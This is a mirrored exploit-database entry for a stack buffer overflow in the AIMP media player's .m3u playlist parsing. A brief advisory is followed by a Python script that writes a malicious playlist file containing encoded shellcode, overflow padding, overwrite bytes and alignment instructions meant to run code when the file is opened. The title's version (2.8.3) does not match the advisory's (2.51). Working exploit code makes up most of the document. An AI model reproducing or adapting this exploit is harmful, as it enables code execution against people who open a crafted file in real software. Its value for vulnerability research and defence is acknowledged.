AIMP 2.8.3 – ‘.m3u’ Remote Stack Buffer Overflow

• Exploit Database
• 16 阅读

• 作者： Molotov
  日期： 2010-02-12
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33640/

• source: https://www.securityfocus.com/bid/38215/info
  
  AIMP is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
  
  Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
  
  AIMP 2.51 is vulnerable; other versions may also be affected. 
  
  #!/usr/bin/python
  #
  # AIMP2 (aimp2c.exe) m3u malformed open file stack overflow exploit
  # Coded by :Molotov
  #
  # Greats To : Corelanc0d3r & exploit-db
  #
  # thanks to : Simo36 & all friends
  #
  shellcode = (
  "PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
  "LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
  "BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
  "KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
  "LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
  "TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
  "KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
  "M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
  "KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
  "2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
  "7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
  "QQ2LRCM0LJA"
  )
  header = "\nNumberOfEntries=3\n\n"
  header += ("File1=");
  crash = 'A' * 2222
  crash+= shellcode
  crash+= 'B' * (4014-len(shellcode)-2222)
  crash+= '\x41\x6d'
  crash+= '\x0e\x45'
  align = '\x58\x6d'
  align+= '\x58\x6d'
  align+= '\x58\x6d'
  align+= '\x58\x6d'
  align+= '\x05\x01\x11\x6d'
  align+= '\x2d\x0F\x11\x6d'
  align+= '\x50\x6d\xC3'
  padd= 'D' * 3000
   
  padd= 'D'*3000#n7Cn
  buffer = header + crash +align+padd +'\n'
  file=open('ss.m3u','w')
  file.write(buffer)
  file.close()
  print "[+] ss.m3u file created successfully"